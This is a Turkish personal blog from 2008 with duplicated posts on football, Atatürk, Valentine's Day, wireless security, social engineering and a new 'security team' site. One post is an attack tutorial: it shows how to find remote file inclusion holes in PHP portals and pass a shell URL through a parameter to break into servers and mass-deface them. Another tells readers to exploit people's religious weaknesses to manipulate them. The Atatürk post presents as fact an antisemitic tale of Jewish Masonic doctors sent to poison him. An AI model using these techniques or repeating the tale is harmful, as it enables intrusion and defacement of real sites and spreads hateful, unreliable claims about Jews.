Merhaba Sevgili Okuyucularım..
Bu gün devletimiz Büyük bi Adım Atıp Kara Harekatını Başlatmıştır.Bu Operasyon sonucu Bir Çok Terorist Ele Geçirilmiştir ama Bunun yanı Sıra Şehit Vermişizdir.Bu Vatan İçin Şehit Düşen Abilerimize Kardeşlerimize Allahdan Rahmet Yakınlarına Sabır diliyorum.Bu Yazıyı Okuyanlardanda Ruhları İçin Fatiha İstiyorum...
Kalın Sağlıcakla...
23 Şubat 2008
21 Şubat 2008
Ve Kazandık...
Bende Bi Koyu Fenerbahceli Olarak Bu günki Kazandığımız Sevilla Mücadelesinde Sevincimi sizlerle Paylaşmak İstedim Takımımdan Ümitliyim ve Bugün Yanımda Macı İzleyenlerden Bi Kaç Kişide Galatasaraylıydı ve Onlarında Milli Mücadele Ruhu İle Fenerbahceye Destek Vermesi Beni Gururlandırdı.Bu günki Zaferden Sonrada Daha Koyu Bi Fenerbahceli Oldum denebilir.Avrupada Galatasaraydanda Ümitliyim Umarum Türk Takımları Olarak Kendimizi Kanıtlarız.
İnşallah Fenerbahcemin Dier Sevilla Maçındada Aynı Gücü Göstererek Avrupaya bizde Varız Diyebiliriz..Neyse Sevincimi Paylaşmak İstedim Okadar..
Sevgilerle....
İnşallah Fenerbahcemin Dier Sevilla Maçındada Aynı Gücü Göstererek Avrupaya bizde Varız Diyebiliriz..Neyse Sevincimi Paylaşmak İstedim Okadar..
Sevgilerle....
18 Şubat 2008
Atatürk'üm
Merhaba Arkadaşlar bu başlığı neden açtım merak ediyosunuzdur bu başlığı kendimce Atatürkü anlatmak benim gözümden benim fikrimden Atatürk'ü anlatmak istedim sizlere..
Atatürk kelime olarak Türkiye cumhuriyetinin atası anlamında olması beni hep grurlandırır ve onurlandırır Bizim bi Atatürkümüzün olması aslında dier ülkelere karşı bi artıdır neden derseniz bir insan bi önder Türk milletinin geleceğini düşünerek bin savaş yönetmiş bin savaş kazanmış bu toprakları bu güzel vatanı bizlere bırakmış bizlerde bence onun gibi düşünüp ileriki nesillere bu güzel toprakları aynı bütünlük içerisinde bırakmalıyız nasılki yaradanımız Allah (cc) bu canı bize emanet etti bir gün ona geri verecez aynı bu şekilde düşünerek Atamızın bize emanet ettiği bu toprakları kendimizce savunmalı ileriki nesillere bırakmalıyız o benim güzümde bi kahramandanda öte bi insan o bizler için torunlarımız için canını ortaya koymuş yüce bi insan hayatımızın her noktasında Atamıza yer vermeliyiz..
Bü gün o güçlü gördüğümüz devletler bile Atamızın kudretinden korkmaktadır ve Atamızın zamanındada bu şekildedir onu Cumhuriyetimizi kurmaması için bi çok yollarla öldürmeyi denemişlerdir. Hadda ve hadda ulu önderimizin bir sözü vardırki aslında bi çok kişi yanlış anlama getirmiştir.
Bu Söz ' Beni Türk Tabiblerine Emanet edin' sözüdür.Bir çok kesim bu sözü türk doktorlarını yücelttiği anlamında yorumlmaktadır.Tabiki türk doktorlarımız yücedir.Ama belki bildiğiniz belki bilmediğini bir olay mevcut sizinle bunuda paylaşayım.Bildiğmiz üzere Atamız zamanındaki Türkiyede yapılanan mason localarına şiddetle karşı çıkıp bu locaları kapattırmıştır ve yahudi cemaati Atamıza çok şerefsizce planlar kurrp onu öldürmek istemiştir.Atamız hastalandığında ise bi çok yahudi mason locası Atamıza zehir enjekte etmek için yahudi doktorlar görevlendirip üzerine yollamıştır bunun istihbaratını alan Atamız ise baş yaverine Beni Türk tabiblerine emanet Edin Demiştir.Bu olayı bana aile Dostumuz Olan bi Tarih Hocası aynı zamanda devletine yüksek makamlarda hizmet etmiş bi abim anlatmıştır.
Bu anlattıklarımdan sonra birazda olsa içinizde oluşan Atatürk sevgisini hisseder gibiyim ama unutmayın o sevgi hep içimizde bende o sevgiyi hatırlatmak için yazdım umarım başarmışımdır..
Okudunuz İçin Teşekkür Ederim Sevgilerle...
Atatürk kelime olarak Türkiye cumhuriyetinin atası anlamında olması beni hep grurlandırır ve onurlandırır Bizim bi Atatürkümüzün olması aslında dier ülkelere karşı bi artıdır neden derseniz bir insan bi önder Türk milletinin geleceğini düşünerek bin savaş yönetmiş bin savaş kazanmış bu toprakları bu güzel vatanı bizlere bırakmış bizlerde bence onun gibi düşünüp ileriki nesillere bu güzel toprakları aynı bütünlük içerisinde bırakmalıyız nasılki yaradanımız Allah (cc) bu canı bize emanet etti bir gün ona geri verecez aynı bu şekilde düşünerek Atamızın bize emanet ettiği bu toprakları kendimizce savunmalı ileriki nesillere bırakmalıyız o benim güzümde bi kahramandanda öte bi insan o bizler için torunlarımız için canını ortaya koymuş yüce bi insan hayatımızın her noktasında Atamıza yer vermeliyiz..
Bü gün o güçlü gördüğümüz devletler bile Atamızın kudretinden korkmaktadır ve Atamızın zamanındada bu şekildedir onu Cumhuriyetimizi kurmaması için bi çok yollarla öldürmeyi denemişlerdir. Hadda ve hadda ulu önderimizin bir sözü vardırki aslında bi çok kişi yanlış anlama getirmiştir.
Bu Söz ' Beni Türk Tabiblerine Emanet edin' sözüdür.Bir çok kesim bu sözü türk doktorlarını yücelttiği anlamında yorumlmaktadır.Tabiki türk doktorlarımız yücedir.Ama belki bildiğiniz belki bilmediğini bir olay mevcut sizinle bunuda paylaşayım.Bildiğmiz üzere Atamız zamanındaki Türkiyede yapılanan mason localarına şiddetle karşı çıkıp bu locaları kapattırmıştır ve yahudi cemaati Atamıza çok şerefsizce planlar kurrp onu öldürmek istemiştir.Atamız hastalandığında ise bi çok yahudi mason locası Atamıza zehir enjekte etmek için yahudi doktorlar görevlendirip üzerine yollamıştır bunun istihbaratını alan Atamız ise baş yaverine Beni Türk tabiblerine emanet Edin Demiştir.Bu olayı bana aile Dostumuz Olan bi Tarih Hocası aynı zamanda devletine yüksek makamlarda hizmet etmiş bi abim anlatmıştır.
Bu anlattıklarımdan sonra birazda olsa içinizde oluşan Atatürk sevgisini hisseder gibiyim ama unutmayın o sevgi hep içimizde bende o sevgiyi hatırlatmak için yazdım umarım başarmışımdır..
Okudunuz İçin Teşekkür Ederim Sevgilerle...
16 Şubat 2008
Hayat mı ?
Bu sefer güvenlikden bahsetmeyecen bu yazıyı gecenin bi vati yazıyorum bide hayata değinmek istedim neden mi bu hayat varya şu 5 harfli kelime varya insanoğlunun ömrünü törpülediği bi şeydir.Herkes muhakkak bu 5 harfli şeyden bi tokat yemişdir tokatıda ağırdır ha öyle herks yiyipde kendine gelemz belkide mahveden bu ya o tokattan sonra toparlanamamak okuyanlardan kimi sevdiğinden ayrılmış tokat yemiştir kimi yakınını kaybetmişdit kimi parasını batırmıştır aslında bunlar o tokatın bahanesi kanmayın herşey bu 5 harfli şeyden kaynaklanıyor.
Kıssadan Hisse bi şey anlatayım belki kimileri biliyodur kimileri bilmiyodur...
Yüce yaradanımız Allah (cc) meleğine demişki sen azrail olacan oda demiş ama yaradanım azrail ne iş yapar görevi nedir Yaradanımız demiş insan oğlunun canını alıp getirecen.
Azrail şaşırmış ama Yaradanım Herken benden nefret eder sevenim olmaz Yaradan şöyle demiş ey meleğim sen hiç düşünme bunları ben onlara öyle bahaneler veririmki sen akıllarına bile gelmessin...
Bu kıssadan hissede de bahsedildiği gibi öyle bahaneler olurki asıl şey aklımıza bile gelmez neden bunları anlatıyorum merak ediyosunuz diyosunzdur güvenlik blogu kurmuş yazdığı şeye bak yazmamdaki amaç birazda duygularım yakın zmanda başımdan geçen bi olay telaffuzda bi hatam olduysa şimdiden özür dilerim hayatta emin olmadığımız hiç bi şeyin peşine takılmamak lazım çünkü hayat oyunlarla dolu birşeydir her an neye uğradığınızı anlamadan çakar tokadı sonra pişman olursunuz işte o pişmanlık acıtır içinizi zor tabi ben çok keşke dedim okuyanlar bari sizler demeyin biraz olsun gözünüzün önüne bakın şükredin yolunuza bakın sizin için iyi olan yollara girin engelleri aşarım diye her engele saldırmayın bazı engeller vardırki sırf azraili aklımıza getirmeyelim diye konulmuştur...
Yazıya daha fazla devam etmek isterim ama sizleride sıkmamak lazım..
Sevgilerle
Kıssadan Hisse bi şey anlatayım belki kimileri biliyodur kimileri bilmiyodur...
Yüce yaradanımız Allah (cc) meleğine demişki sen azrail olacan oda demiş ama yaradanım azrail ne iş yapar görevi nedir Yaradanımız demiş insan oğlunun canını alıp getirecen.
Azrail şaşırmış ama Yaradanım Herken benden nefret eder sevenim olmaz Yaradan şöyle demiş ey meleğim sen hiç düşünme bunları ben onlara öyle bahaneler veririmki sen akıllarına bile gelmessin...
Bu kıssadan hissede de bahsedildiği gibi öyle bahaneler olurki asıl şey aklımıza bile gelmez neden bunları anlatıyorum merak ediyosunuz diyosunzdur güvenlik blogu kurmuş yazdığı şeye bak yazmamdaki amaç birazda duygularım yakın zmanda başımdan geçen bi olay telaffuzda bi hatam olduysa şimdiden özür dilerim hayatta emin olmadığımız hiç bi şeyin peşine takılmamak lazım çünkü hayat oyunlarla dolu birşeydir her an neye uğradığınızı anlamadan çakar tokadı sonra pişman olursunuz işte o pişmanlık acıtır içinizi zor tabi ben çok keşke dedim okuyanlar bari sizler demeyin biraz olsun gözünüzün önüne bakın şükredin yolunuza bakın sizin için iyi olan yollara girin engelleri aşarım diye her engele saldırmayın bazı engeller vardırki sırf azraili aklımıza getirmeyelim diye konulmuştur...
Yazıya daha fazla devam etmek isterim ama sizleride sıkmamak lazım..
Sevgilerle
13 Şubat 2008
Wireless Güvenlik
Wireless ağlarda WEP kullanımı wireless ağların güvenliğini saglamakta yetersiz kalıyor. * MAC adresine gore erisim kisitlanmasi kolayca asilabiliyor
* "WEP anahtarini kirabilmek icin yeterli veri toplanilmasi gerekiyor, dolayisiyla WEP anahtarini duzenli araliklarda degistirmek problemimizi giderir" fikri de curutulmus durumda. Konuyla ilgili bir grup FBI ajaninin yaptigi, yaklasik 3 dakikada WEP anahtarinin kirilmasi demonstrasyonu hakkinda bilgiye buradan ulasilabilir. WEP anahtari kirma demolari, guvenlik ile ilgili olan live cd dagitimlarinin web sitelerinde yerlerini almis bile.
o Cracking WEP in 10 minutes
o 128 Bit WEP cracking (izlemedim)
WEP yerine WPA kullanilmasi gerekiyor. Ancak WPA-PSK (WPA and a pre-shared key) kullaniminda passphrase secimi cok onemli, cunku bu passphrase brute-force(deneme/yanilma) saldirilarina acik. Dolayisiyla uzun ve kompleks passphrase secimi onem kazaniyor.
Bu brute-force saldirisinin nasil yapilabildigini gormek icin, bugun rasladigim WPA Cracking demonstrasyonu izlenebilir.
Su sira en iyi secim, WPA-Enterprise olarak gecen, WPA + 802.1x kullanimi olarak gozukuyor
Bu Kısa ve Öz Dökümanı Siz Okuyucularım İçin Buldu ve Düzenledim..
* "WEP anahtarini kirabilmek icin yeterli veri toplanilmasi gerekiyor, dolayisiyla WEP anahtarini duzenli araliklarda degistirmek problemimizi giderir" fikri de curutulmus durumda. Konuyla ilgili bir grup FBI ajaninin yaptigi, yaklasik 3 dakikada WEP anahtarinin kirilmasi demonstrasyonu hakkinda bilgiye buradan ulasilabilir. WEP anahtari kirma demolari, guvenlik ile ilgili olan live cd dagitimlarinin web sitelerinde yerlerini almis bile.
o Cracking WEP in 10 minutes
o 128 Bit WEP cracking (izlemedim)
WEP yerine WPA kullanilmasi gerekiyor. Ancak WPA-PSK (WPA and a pre-shared key) kullaniminda passphrase secimi cok onemli, cunku bu passphrase brute-force(deneme/yanilma) saldirilarina acik. Dolayisiyla uzun ve kompleks passphrase secimi onem kazaniyor.
Bu brute-force saldirisinin nasil yapilabildigini gormek icin, bugun rasladigim WPA Cracking demonstrasyonu izlenebilir.
Su sira en iyi secim, WPA-Enterprise olarak gecen, WPA + 802.1x kullanimi olarak gozukuyor
Bu Kısa ve Öz Dökümanı Siz Okuyucularım İçin Buldu ve Düzenledim..
12 Şubat 2008
Sosyal Mühendislik
Merhaba okuyucularım bu seferki yazımda kendimce sosyalmühendislikden bahsedeceğim sosyal mühendislik hayatımızın her dalnda bize yardımcı olur hack,kız ark bulma,arkadaş bulma,para kazanma vs vs...
Sosyal Mühendislik tabiri caizse karşınızdaki kişiyi kandırma sanatıdır aslında kandırma kelimesi birz kabaca olur zihnine girme sanatı diyeyim.
Nasıl Yapıldığından Bahsetmek gerekirse aslında gayet basit tbi zekamızın ölçüsüne göre bu basitlik oranını diyebiliriz çünki karşımızdaki kişinin bilinç altını etkileyecez..
Sosyal mühendislik uygulayacağımız kişiyi öncelikle keşf etmemiz lazım nelerden hoşlanır zafları nerlerdir hangi konularda iş yapmayı sever gibi özelliklerini araştıracaz.
Örneğin ;
Karşımızdaki kişinin dini olarak zaafı var bunu anladık hiç beklemeden dini bölümden bilincine inecez ona destek olduğumuzun güvencesini vereceğiz özellikle bi tavsiye bilmediğiniz konularda konuşmaktan kaçının yoksa karşımızdaki kişi sıkılabilir..
Konuya ilginç noktalardan değineceksiniz herzman ve merak uyandıracaksınız unutmayınki her insanın içinde merak iç güdüsü vardır kiminde baskın kiminde çekingen şekilde Konuyu uzun tutmak istemiyorum pratiğinden bahsettim sizlere daha uzatırsak farklı algılanır kimsenin sıkılmasını istemem umarım ufak da olsa bu anlatım işinize yarar ve faydalı olur kendimce sosyal mühendisliğin tanımını yaptım ve ufak bi tiyo verdim.. sevgilerle....
Sosyal Mühendislik tabiri caizse karşınızdaki kişiyi kandırma sanatıdır aslında kandırma kelimesi birz kabaca olur zihnine girme sanatı diyeyim.
Nasıl Yapıldığından Bahsetmek gerekirse aslında gayet basit tbi zekamızın ölçüsüne göre bu basitlik oranını diyebiliriz çünki karşımızdaki kişinin bilinç altını etkileyecez..
Sosyal mühendislik uygulayacağımız kişiyi öncelikle keşf etmemiz lazım nelerden hoşlanır zafları nerlerdir hangi konularda iş yapmayı sever gibi özelliklerini araştıracaz.
Örneğin ;
Karşımızdaki kişinin dini olarak zaafı var bunu anladık hiç beklemeden dini bölümden bilincine inecez ona destek olduğumuzun güvencesini vereceğiz özellikle bi tavsiye bilmediğiniz konularda konuşmaktan kaçının yoksa karşımızdaki kişi sıkılabilir..
Konuya ilginç noktalardan değineceksiniz herzman ve merak uyandıracaksınız unutmayınki her insanın içinde merak iç güdüsü vardır kiminde baskın kiminde çekingen şekilde Konuyu uzun tutmak istemiyorum pratiğinden bahsettim sizlere daha uzatırsak farklı algılanır kimsenin sıkılmasını istemem umarım ufak da olsa bu anlatım işinize yarar ve faydalı olur kendimce sosyal mühendisliğin tanımını yaptım ve ufak bi tiyo verdim.. sevgilerle....
Merhaba Dünya
Merhaba Dünya 14 şubata 2 gün kala sizlere yazmak istedim bu 14 şubata gerçekten sevgilim olmadan girecem :) Nedenmi ocağın ilk haftası ayrıldm ve sürekli şehir deiştirdiğim için kızlarla ilgilenemiyorum.
Benimle İlgilenen Çok Ama Vakit Yok Gerçekten ençok koyanda bu zaten vakit.Şimdi erkekler düşünüyo kızlara ne hediye alsaam tabi kızlarda aynı şeyi düşünüyor.O düşünen Arkadaşlara Bi nebzede olsa yardımım dokunsun Erkekler kalpleri feth etmek istiyosanız sış bi restorantda zarif bi yemek ve yemeğin üzerine şık bi kolye veya şık bi biblo alırsanız muhtemelen partnerinizin çok hoşuna gidecektir.Ha Kız arkadaşınız çocuk ruhlu birimi tutun elinden oyuncakcıya gidin oda güzel oluyor..
Sıra kızlarda kızlaaaar bu laflar size her sene saçma hediyeler alır gelirsiniz bu sene artık güzel bi şey alın erkek arkadaşlarınıza örneğin bi kravat veyagüzel bi biblo veya koca bi seni seviyoum yazılı ayı alın neyse dediğim gibi ben sevgilisiz girecem 14 şubata bi yönden masrafımda yok hani :)
Şimdiden Bütün Sevgililerin Sevgililer Gününü Kutluyorum Herkes İçin Hayırlısı...
Benimle İlgilenen Çok Ama Vakit Yok Gerçekten ençok koyanda bu zaten vakit.Şimdi erkekler düşünüyo kızlara ne hediye alsaam tabi kızlarda aynı şeyi düşünüyor.O düşünen Arkadaşlara Bi nebzede olsa yardımım dokunsun Erkekler kalpleri feth etmek istiyosanız sış bi restorantda zarif bi yemek ve yemeğin üzerine şık bi kolye veya şık bi biblo alırsanız muhtemelen partnerinizin çok hoşuna gidecektir.Ha Kız arkadaşınız çocuk ruhlu birimi tutun elinden oyuncakcıya gidin oda güzel oluyor..
Sıra kızlarda kızlaaaar bu laflar size her sene saçma hediyeler alır gelirsiniz bu sene artık güzel bi şey alın erkek arkadaşlarınıza örneğin bi kravat veyagüzel bi biblo veya koca bi seni seviyoum yazılı ayı alın neyse dediğim gibi ben sevgilisiz girecem 14 şubata bi yönden masrafımda yok hani :)
Şimdiden Bütün Sevgililerin Sevgililer Gününü Kutluyorum Herkes İçin Hayırlısı...
11 Şubat 2008
ShadowTURK.Org Açıldı...
Uzun zamandır proje gözüyle baktığım bir sitedir ShadowTurk.org bu siteyi açmamızdaki amaç
kendi dilimiz döndüğünce internet kullnıcılarını bilgilendirmektir.şuan forum bölümü aktifdir üye olup bildiklerinizi bilmeyenlerle paylaşmak artık daha iyi bi ortamda olacak kısa sürede iyi yol aldık hali hazırda bi kaç exploitimiz yayında aynı zmanda proxy hizmetide vermekteyiz.Anlayacağınız yeni nesil bi security team kurmuş olduk.
Daha Detaylı Gözlem İçin : www.ShadowTurk.org adresini ziyaret edin...
Hepimizi İçin Hayırlı Uğurlu Olsun...!
kendi dilimiz döndüğünce internet kullnıcılarını bilgilendirmektir.şuan forum bölümü aktifdir üye olup bildiklerinizi bilmeyenlerle paylaşmak artık daha iyi bi ortamda olacak kısa sürede iyi yol aldık hali hazırda bi kaç exploitimiz yayında aynı zmanda proxy hizmetide vermekteyiz.Anlayacağınız yeni nesil bi security team kurmuş olduk.
Daha Detaylı Gözlem İçin : www.ShadowTurk.org adresini ziyaret edin...
Hepimizi İçin Hayırlı Uğurlu Olsun...!
PHP Scriptlerde RFI Açığı Bulmak..
S.a Okuyuclarım Döküman Yazmıyorum Bu Nedenle Sizlere Php Scirptlerde Remote File İnclude
Açığı Bulmayı Dilimiz Döndüğünce Anlatacağım Bu Açığın Kısacası RFI Oluyor Heykır Delikanlılar Çok Kullanır..
Aslında Bi Ön Bilgi Vermek Lazımsa Bu Açıklardan Yararlanıp Servera Girebilir Mass Deface Yapabiliriz.Tabi Dökümanı
Okuyup Gidip Ünlü Olarak Tabir Ettiğimiz Scriptlerde Aramayın Hayal Kırıklığına Uğrarsınız..
Neyse Çok Konuştuk Artık Konumuza Dönelim..
İlk Başta Açık Arayacağımız Bi Scirpt systemi bi portal Sistemi download Ediyoruz Bunlara Hotscripts.com gibi sitelerden Download Edebilirsiniz.
Portalımızı DOwnload Ettik.Sıra Geldi 2. Güzel Bi Araca Açığı Bulmada En Güzel Yardımcılardan biriside Notepad2 Programı Adındanda Anlaşıldığı
gibi notepad in 2. versiyonudur ve bi Çok Güzel Özellik Katılmıştır...
Araçlarımız Tamamsa Sıra Geldi Açık Aramaya Artık Bu İşler İçin Exploitler Çıktı Ama Manualin Zevki Heyecanı bi Başka Oluyor..
Portalımızı açtık Bi Klasöre İçerisinde ;
Örneğin ; index.php atıyorum header.php gibi scritpler bulunur Bunlardan Birini notepad2 de açıyoruz.
Misal Olarak İndex.php yi Açtık İçerisinde Aramamız Gereken Kodlar ;
İnclude_
İnclude_once
require
require_once
Bu kodların yanlarında yanında Dolar işareti Olarak Tabir Ettiğimiz $ işaretli kelimeler arayacaz..
Örneğin ;
}
require($P_INDEX."blank.inc");
}
Örnekde Verilen Şekilde Bi Kod Bulursak İndex.php de açık var demektir ve Bu kodu Şu Şekilde Kullanırız..
Örneğin ;
wwww.oscriotinolduğusite.com/index.php?P_INDEX=[shell adresi]
Şeklinde Olur ve Shellinzle Servera girmiş Olursunuz..
Sıra Dikkat Edilmesi Gereken Noktada Şimdi Bilindiği Üzere Bu Kodlar HEryerde MEvcut Peki Coderler Kapatmak için Ne Yapıyo
Tabiki Onuda anlatacağım Bu Kodları Her gördüğünüzde Heycanlanmayın Scritpti notepad2 ye attığımızda kodların En Başında
Yani Başlangıçda define yazısı görürsek hayalleriniz Suya Düşer.
Örneğin ;
define('IN_SUBDREAMER', true);
Bunun Yazdığı Sayfada Açık Yok demektir Şansımızı Başka Sayfalarda Deniyecez Artık..
Sanırım Geniş anlatımlı Ve Anlaşılır Bi Döküman Olmuştur Tamamen Sizler İçin Yazdım Ve Yorgun Argın Yazdım Değerini Bilin bu Dökümanın
İnşallah Yararlı İşlerde Kullanırsınız Daha Yeni Ve Güzel Dökümanlar Yazacağım sizler İçin..
Sevgilerimle ...
Açığı Bulmayı Dilimiz Döndüğünce Anlatacağım Bu Açığın Kısacası RFI Oluyor Heykır Delikanlılar Çok Kullanır..
Aslında Bi Ön Bilgi Vermek Lazımsa Bu Açıklardan Yararlanıp Servera Girebilir Mass Deface Yapabiliriz.Tabi Dökümanı
Okuyup Gidip Ünlü Olarak Tabir Ettiğimiz Scriptlerde Aramayın Hayal Kırıklığına Uğrarsınız..
Neyse Çok Konuştuk Artık Konumuza Dönelim..
İlk Başta Açık Arayacağımız Bi Scirpt systemi bi portal Sistemi download Ediyoruz Bunlara Hotscripts.com gibi sitelerden Download Edebilirsiniz.
Portalımızı DOwnload Ettik.Sıra Geldi 2. Güzel Bi Araca Açığı Bulmada En Güzel Yardımcılardan biriside Notepad2 Programı Adındanda Anlaşıldığı
gibi notepad in 2. versiyonudur ve bi Çok Güzel Özellik Katılmıştır...
Araçlarımız Tamamsa Sıra Geldi Açık Aramaya Artık Bu İşler İçin Exploitler Çıktı Ama Manualin Zevki Heyecanı bi Başka Oluyor..
Portalımızı açtık Bi Klasöre İçerisinde ;
Örneğin ; index.php atıyorum header.php gibi scritpler bulunur Bunlardan Birini notepad2 de açıyoruz.
Misal Olarak İndex.php yi Açtık İçerisinde Aramamız Gereken Kodlar ;
İnclude_
İnclude_once
require
require_once
Bu kodların yanlarında yanında Dolar işareti Olarak Tabir Ettiğimiz $ işaretli kelimeler arayacaz..
Örneğin ;
}
require($P_INDEX."blank.inc");
}
Örnekde Verilen Şekilde Bi Kod Bulursak İndex.php de açık var demektir ve Bu kodu Şu Şekilde Kullanırız..
Örneğin ;
wwww.oscriotinolduğusite.com/index.php?P_INDEX=[shell adresi]
Şeklinde Olur ve Shellinzle Servera girmiş Olursunuz..
Sıra Dikkat Edilmesi Gereken Noktada Şimdi Bilindiği Üzere Bu Kodlar HEryerde MEvcut Peki Coderler Kapatmak için Ne Yapıyo
Tabiki Onuda anlatacağım Bu Kodları Her gördüğünüzde Heycanlanmayın Scritpti notepad2 ye attığımızda kodların En Başında
Yani Başlangıçda define yazısı görürsek hayalleriniz Suya Düşer.
Örneğin ;
define('IN_SUBDREAMER', true);
Bunun Yazdığı Sayfada Açık Yok demektir Şansımızı Başka Sayfalarda Deniyecez Artık..
Sanırım Geniş anlatımlı Ve Anlaşılır Bi Döküman Olmuştur Tamamen Sizler İçin Yazdım Ve Yorgun Argın Yazdım Değerini Bilin bu Dökümanın
İnşallah Yararlı İşlerde Kullanırsınız Daha Yeni Ve Güzel Dökümanlar Yazacağım sizler İçin..
Sevgilerimle ...
Kaydol:
Kayıtlar (Atom)